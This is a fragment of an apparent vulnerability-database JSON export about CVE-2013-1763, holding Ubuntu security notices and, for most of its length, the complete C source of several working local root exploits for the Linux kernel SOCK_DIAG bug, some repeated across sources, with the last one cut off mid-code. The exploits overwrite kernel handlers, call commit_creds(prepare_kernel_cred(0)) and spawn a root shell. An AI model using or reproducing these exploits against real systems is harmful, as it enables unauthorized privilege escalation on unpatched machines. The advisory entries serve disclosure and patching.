Local exploit for linux platform", "published": "2013-02-24T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-02-24T00:00:00", "id": "EDB-ID:33336", "href": "https://www.exploit-db.com/exploits/33336/", "sourceData": "/* \r\n* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8\r\n* bug found by Spender\r\n* poc by SynQ\r\n* \r\n* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux\r\n* using nl_table->hash.rehash_time, index 81\r\n* \r\n* Fedora 18 support added\r\n* \r\n* 2/2013\r\n*/\r\n\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n\r\nint __attribute__((regparm(3)))\r\nkernel_code()\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\treturn -1;\r\n}\r\n\r\nint jump_payload_not_used(void *skb, void *nlh)\r\n{\r\n\tasm volatile (\r\n\t\t\"mov $kernel_code, %eax\\n\"\r\n\t\t\"call *%eax\\n\"\r\n\t);\r\n}\r\n\r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy, sym[512];\r\n\tint ret = 0;\r\n \r\n\tf = fopen(\"/proc/kallsyms\", \"r\");\r\n\tif (!f) {\r\n\t\treturn 0;\r\n\t}\r\n \r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sym);\r\n\t\tif (ret == 0) 
{\r\n\t\t\tfscanf(f, \"%s\\n\", sym);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sym)) {\r\n\t\t\tprintf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\tfclose(f);\r\n \r\n\treturn 0;\r\n}\r\n\r\nint main(int argc, char*argv[])\r\n{\r\n\tint fd;\r\n\tunsigned family;\r\n\tstruct {\r\n\t\tstruct nlmsghdr nlh;\r\n\t\tstruct unix_diag_req r;\r\n\t} req;\r\n\tchar\tbuf[8192];\r\n\r\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n\t\tprintf(\"Can't create sock diag socket\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.nlh.nlmsg_len = sizeof(req);\r\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n\treq.nlh.nlmsg_seq = 123456;\r\n\r\n\t//req.r.sdiag_family = 89;\r\n\treq.r.udiag_states = -1;\r\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n\r\n\tif(argc==1){\r\n\t\tprintf(\"Run: %s Fedora|Ubuntu\\n\",argv[0]);\r\n\t\treturn 0;\r\n\t}\r\n\telse if(strcmp(argv[1],\"Fedora\")==0){\r\n\t commit_creds = (_commit_creds) get_symbol(\"commit_creds\");\r\n\t prepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\r\n\t sock_diag_handlers = get_symbol(\"sock_diag_handlers\");\r\n\t nl_table = get_symbol(\"nl_table\");\r\n\t \r\n\t if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){\r\n\t\tprintf(\"some symbols are not available!\\n\");\r\n\t\texit(1);\r\n\t\t}\r\n\r\n\t family = (nl_table - sock_diag_handlers) / 4;\r\n\t printf(\"family=%d\\n\",family);\r\n\t req.r.sdiag_family = family;\r\n\t \r\n\t if(family>255){\r\n\t\tprintf(\"nl_table is too far!\\n\");\r\n\t\texit(1);\r\n\t\t}\r\n\t}\r\n\telse if(strcmp(argv[1],\"Ubuntu\")==0){\r\n\t commit_creds = (_commit_creds) 0xc106bc60;\r\n\t prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;\r\n\t req.r.sdiag_family = 
81;\r\n\t}\r\n\r\n\tunsigned long mmap_start, mmap_size;\r\n\tmmap_start = 0x10000;\r\n\tmmap_size = 0x120000;\r\n\tprintf(\"mmapping at 0x%lx, size = 0x%lx\\n\", mmap_start, mmap_size);\r\n\r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n\tmemset((void*)mmap_start, 0x90, mmap_size);\r\n\r\n\tchar jump[] = \"\\x55\\x89\\xe5\\xb8\\x11\\x11\\x11\\x11\\xff\\xd0\\x5d\\xc3\"; // jump_payload in asm\r\n\tunsigned long *asd = &jump[4];\r\n\t*asd = (unsigned long)kernel_code;\r\n\r\n\tmemcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));\r\n\r\n\tif ( send(fd, &req, sizeof(req), 0) < 0) {\r\n\t\tprintf(\"bad send\\n\");\r\n\t\tclose(fd);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tprintf(\"uid=%d, euid=%d\\n\",getuid(), geteuid() );\r\n\r\n\tif(!getuid())\r\n\t\tsystem(\"/bin/sh\");\r\n\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33336/"}, {"lastseen": "2016-02-02T23:31:39", "description": "Archlinux x86-64 3.3.x - 3.7.x x86-64 - sock_diag_handlers[] Local Root. CVE-2013-1763. 
Local exploit for linux platform", "published": "2013-02-27T00:00:00", "type": "exploitdb", "title": "Archlinux x86-64 3.3.x - 3.7.x x86-64 - sock_diag_handlers Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-02-27T00:00:00", "id": "EDB-ID:24555", "href": "https://www.exploit-db.com/exploits/24555/", "sourceData": "// archer.c\r\n//\r\n// 2012 sd@fucksheep.org\r\n//\r\n// Works reliably against x86-64 3.3-3.7 arch.\r\n//\r\n// Tested against:\r\n//\r\n// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux\r\n// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux\r\n// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux\r\n// ...\r\n\r\n#include <assert.h>\r\n\r\n#define JUMP 0x0000100000001000LL\r\n#define BASE 0x380000000\r\n#define SIZE 0x010000000\r\n#define KSIZE 0x2000000\r\n\r\nstatic long ugid;\r\n\r\nvoid patch_current() {\r\n int i,j,k;\r\n char *current = *(char**)(((long)&i) & (-8192));\r\n long kbase = ((long)current)>>36;\r\n\r\n for (i=0; i<4000; i+=4) {\r\n long *p = (void *)&current[i];\r\n int *t = (void*) p[0];\r\n if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;\r\n for (j=0; j<20; j++) {\r\n for (k = 0; k < 8; k++)\r\n if (((int*)&ugid)[k%2] != t[j+k]) goto next;\r\n for (i = 0; i < 8; i++) t[j+i] = 0;\r\n for (i = 0; i < 10; i++) t[j+9+i] = -1;\r\n return;\r\nnext:; }\r\n }\r\n}\r\n\r\n\r\nint main()\r\n{\r\n long u = getuid();\r\n long g = getgid();\r\n int i, f = socket(16,3,4);\r\n static int n[10] = {40,0x10014,0,0,45,-1};\r\n\r\n assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);\r\n\r\n setresuid(u,u,u); setresgid(g,g,g);\r\n ugid = (g<<32)|u;\r\n\r\n memcpy(1<<12, &patch_current, 1024);\r\n for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;\r\n send(f, n, sizeof(n), 0);\r\n setuid(0);\r\n return execl(\"/bin/bash\", \"-sh\", 0);\r\n}", "cvss": {"score": 7.2, "vector": 
"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24555/"}, {"lastseen": "2016-02-02T23:56:13", "description": "Ubuntu 12.10 - (64-Bit) sock_diag_handlers - Local Root Exploit. CVE-2013-1763. Local exploit for lin_x86-64 platform", "published": "2013-03-13T00:00:00", "type": "exploitdb", "title": "Ubuntu 12.10 - 64-Bit sock_diag_handlers - Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-03-13T00:00:00", "id": "EDB-ID:24746", "href": "https://www.exploit-db.com/exploits/24746/", "sourceData": "#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n\r\nint __attribute__((regparm(3)))\r\nx()\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\treturn -1;\r\n}\r\n\r\nchar stage1[] = \"\\xff\\x25\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\nint main() {\r\n\tint fd;\r\n unsigned long mmap_start, mmap_size = 0x10000;\r\n\tunsigned family;\r\n\tstruct {\r\n\t\tstruct nlmsghdr nlh;\r\n\t\tstruct unix_diag_req r;\r\n\t} req;\r\n\tchar\tbuf[8192];\r\n\r\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n\t\tprintf(\"Can't create sock diag socket\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.nlh.nlmsg_len = sizeof(req);\r\n\treq.nlh.nlmsg_type = 
SOCK_DIAG_BY_FAMILY;\r\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n\treq.nlh.nlmsg_seq = 123456;\r\n\r\n\treq.r.udiag_states = -1;\r\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n\r\n\t/* Ubuntu 12.10 x86_64 */\r\n\treq.r.sdiag_family = 0x37;\r\n\tcommit_creds = (_commit_creds) 0xffffffff8107d180;\r\n\tprepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;\r\n mmap_start = 0x1a000;\r\n\r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n\t\tMAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n\r\n\t\tprintf(\"mmap fault\\n\");\r\n\t\texit(1);\r\n }\r\n\r\n *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;\r\n memset((void *)mmap_start, 0x90, mmap_size);\r\n memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));\r\n\r\n\tsend(fd, &req, sizeof(req), 0);\r\n\tif(!getuid())\r\n\t\tsystem(\"/bin/sh\");\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24746/"}], "ubuntu": [{"lastseen": "2020-07-09T01:38:30", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1763"], "description": "Mathias Krause discovered a bounds checking error for netlink messages \nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit \nthis flaw to crash the system or run programs as an administrator.", "edition": 5, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "USN-1751-1", "href": "https://ubuntu.com/security/notices/USN-1751-1", "title": "Linux kernel (OMAP4) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:28", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1763"], "description": "Mathias Krause discovered a bounds checking error for netlink messages \nrequesting SOCK_DIAG_BY_FAMILY. 
An unprivileged local user could exploit \nthis flaw to crash the system or run programs as an administrator.", "edition": 5, "modified": "2013-02-26T00:00:00", "published": "2013-02-26T00:00:00", "id": "USN-1749-1", "href": "https://ubuntu.com/security/notices/USN-1749-1", "title": "Linux kernel (Quantal HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:23:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1763"], "description": "Mathias Krause discovered a bounds checking error for netlink messages \nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit \nthis flaw to crash the system or run programs as an administrator.", "edition": 5, "modified": "2013-02-26T00:00:00", "published": "2013-02-26T00:00:00", "id": "USN-1750-1", "href": "https://ubuntu.com/security/notices/USN-1750-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-10T04:12:50", "description": "Local root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[] vulnerability in Linux kernels before 3.7.10.", "edition": 2, "published": "2013-03-13T00:00:00", "type": "zdt", "title": "Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-03-13T00:00:00", "id": "1337DAY-ID-20499", "href": "https://0day.today/exploit/description/20499", "sourceData": "#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long 
cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n \r\nint __attribute__((regparm(3)))\r\nx()\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n \r\nchar stage1[] = \"\\xff\\x25\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n \r\nint main() {\r\n int fd;\r\n unsigned long mmap_start, mmap_size = 0x10000;\r\n unsigned family;\r\n struct {\r\n struct nlmsghdr nlh;\r\n struct unix_diag_req r;\r\n } req;\r\n char buf[8192];\r\n \r\n if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n printf(\"Can't create sock diag socket\\n\");\r\n return -1;\r\n }\r\n \r\n memset(&req, 0, sizeof(req));\r\n req.nlh.nlmsg_len = sizeof(req);\r\n req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n req.nlh.nlmsg_seq = 123456;\r\n \r\n req.r.udiag_states = -1;\r\n req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n \r\n /* Ubuntu 12.10 x86_64 */\r\n req.r.sdiag_family = 0x37;\r\n commit_creds = (_commit_creds) 0xffffffff8107d180;\r\n prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;\r\n mmap_start = 0x1a000;\r\n \r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n \r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n \r\n *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;\r\n memset((void *)mmap_start, 0x90, mmap_size);\r\n memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));\r\n \r\n send(fd, &req, sizeof(req), 0);\r\n if(!getuid())\r\n system(\"/bin/sh\");\r\n}\n\n# 0day.today [2018-03-10] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://0day.today/exploit/20499"}, {"lastseen": "2018-03-09T23:28:33", "edition": 2, "description": "Exploit for linux platform in category local exploits", "published": "2014-05-17T00:00:00", "type": "zdt", "title": "Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2014-05-17T00:00:00", "id": "1337DAY-ID-22258", "href": "https://0day.today/exploit/description/22258", "sourceData": "/*\r\n* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8\r\n* bug found by Spender\r\n* poc by SynQ\r\n*\r\n* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux\r\n* using nl_table->hash.rehash_time, index 81\r\n*\r\n* Fedora 18 support added\r\n*\r\n* 2/2013\r\n*/\r\n \r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n \r\nint __attribute__((regparm(3)))\r\nkernel_code()\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n \r\nint jump_payload_not_used(void *skb, void *nlh)\r\n{\r\n asm volatile (\r\n \"mov $kernel_code, %eax\\n\"\r\n \"call *%eax\\n\"\r\n );\r\n}\r\n \r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy, sym[512];\r\n int ret = 0;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (!f) {\r\n return 0;\r\n }\r\n \r\n while (ret != EOF) 
{\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sym);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sym);\r\n continue;\r\n }\r\n if (!strcmp(name, sym)) {\r\n printf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char*argv[])\r\n{\r\n int fd;\r\n unsigned family;\r\n struct {\r\n struct nlmsghdr nlh;\r\n struct unix_diag_req r;\r\n } req;\r\n char buf[8192];\r\n \r\n if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n printf(\"Can't create sock diag socket\\n\");\r\n return -1;\r\n }\r\n \r\n memset(&req, 0, sizeof(req));\r\n req.nlh.nlmsg_len = sizeof(req);\r\n req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n req.nlh.nlmsg_seq = 123456;\r\n \r\n //req.r.sdiag_family = 89;\r\n req.r.udiag_states = -1;\r\n req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n \r\n if(argc==1){\r\n printf(\"Run: %s Fedora|Ubuntu\\n\",argv[0]);\r\n return 0;\r\n }\r\n else if(strcmp(argv[1],\"Fedora\")==0){\r\n commit_creds = (_commit_creds) get_symbol(\"commit_creds\");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\r\n sock_diag_handlers = get_symbol(\"sock_diag_handlers\");\r\n nl_table = get_symbol(\"nl_table\");\r\n \r\n if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){\r\n printf(\"some symbols are not available!\\n\");\r\n exit(1);\r\n }\r\n \r\n family = (nl_table - sock_diag_handlers) / 4;\r\n printf(\"family=%d\\n\",family);\r\n req.r.sdiag_family = family;\r\n \r\n if(family>255){\r\n printf(\"nl_table is too far!\\n\");\r\n exit(1);\r\n }\r\n }\r\n else if(strcmp(argv[1],\"Ubuntu\")==0){\r\n commit_creds = (_commit_creds) 0xc106bc60;\r\n prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;\r\n req.r.sdiag_family = 81;\r\n }\r\n \r\n unsigned long mmap_start, 
mmap_size;\r\n mmap_start = 0x10000;\r\n mmap_size = 0x120000;\r\n printf(\"mmapping at 0x%lx, size = 0x%lx\\n\", mmap_start, mmap_size);\r\n \r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n memset((void*)mmap_start, 0x90, mmap_size);\r\n \r\n char jump[] = \"\\x55\\x89\\xe5\\xb8\\x11\\x11\\x11\\x11\\xff\\xd0\\x5d\\xc3\"; // jump_payload in asm\r\n unsigned long *asd = &jump[4];\r\n *asd = (unsigned long)kernel_code;\r\n \r\n memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));\r\n \r\n if ( send(fd, &req, sizeof(req), 0) < 0) {\r\n printf(\"bad send\\n\");\r\n close(fd);\r\n return -1;\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\",getuid(), geteuid() );\r\n \r\n if(!getuid())\r\n system(\"/bin/sh\");\r\n \r\n}\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22258"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1763"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1750-1\r\nFebruary 26, 2013\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n\r\nSummary:\r\n\r\nThe system could be made to crash or run programs as an administrator.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nBrad Spengler discovered a bounds checking error for netlink messages\r\nrequesting SOCK_DIAG_BY_FAMILY. 
An unprivileged local user could exploit\r\nthis flaw to crash the system or run programs as an administrator.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n linux-image-3.5.0-25-generic 3.5.0-25.39\r\n linux-image-3.5.0-25-highbank 3.5.0-25.39\r\n linux-image-3.5.0-25-omap 3.5.0-25.39\r\n linux-image-3.5.0-25-powerpc-smp 3.5.0-25.39\r\n linux-image-3.5.0-25-powerpc64-smp 3.5.0-25.39\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1750-1\r\n CVE-2013-1763\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.5.0-25.39\r\n", "edition": 1, "modified": "2013-03-02T00:00:00", "published": "2013-03-02T00:00:00", "id": "SECURITYVULNS:DOC:29114", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29114", "title": "[USN-1750-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-0871", "CVE-2012-4508", "CVE-2013-0190", "CVE-2013-1763", "CVE-2012-2669", "CVE-2013-0231"], "description": "Privilege escalation, information leak.", "edition": 1, "modified": "2013-03-02T00:00:00", "published": "2013-03-02T00:00:00", "id": "SECURITYVULNS:VULN:12888", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12888", "title": "Linux kernel security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": 
"2020-04-01T19:04:26", "description": "\nLinux Kernel 3.5.0-23 (Ubuntu 12.04.2 x64) - SOCK_DIAG SMEP Bypass Local Privilege Escalation", "edition": 1, "published": "2015-08-26T00:00:00", "title": "Linux Kernel 3.5.0-23 (Ubuntu 12.04.2 x64) - SOCK_DIAG SMEP Bypass Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2015-08-26T00:00:00", "id": "EXPLOITPACK:E0C7D9E17F3479DD89B304D4E8F8DBAE", "href": "", "sourceData": "/** \n * based on the exploit by SynQ\n *\n * Modified PoC for CVE-2013-1763 with SMEP bypass\n * Presentation: Practical SMEP Bypass Techniques on Linux\n * Vitaly Nikolenko\n * vnik@cyseclabs.com\n * \n * Target: Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:13:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux\n *\n * gcc sockdiag_smep.c -O2 -o pwn \n */\n\n/**\n EDB Note: Video ~ https://youtu.be/jHJd-5NvWlQ\n**/\n\n#include <unistd.h>\n#include <sys/socket.h>\n#include <netinet/tcp.h>\n#include <errno.h>\n#include <linux/if.h>\n#include <linux/filter.h>\n#include <string.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <linux/inet_diag.h>\n#include <sys/mman.h>\n#include <assert.h>\n//#include <linux/sock_diag.h>\n//#include <linux/unix_diag.h>\n//#include <linux/netlink.h>\n#include \"sock_diag.h\"\n#include \"unix_diag.h\"\n#include \"netlink.h\"\n\nunsigned long user_cs;\nunsigned long user_ss;\nunsigned long user_rflags;\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\nunsigned long sock_diag_handlers, nl_table;\n\nstatic void saveme() {\n\tasm(\n\t\"movq %%cs, %0\\n\"\n\t\"movq %%ss, %1\\n\"\n\t\"pushfq\\n\"\n\t\"popq %2\\n\"\n\t: \"=r\" (user_cs), \"=r\" (user_ss), \"=r\" (user_rflags) : : \"memory\" \t\t);\n}\n\nvoid shell(void) 
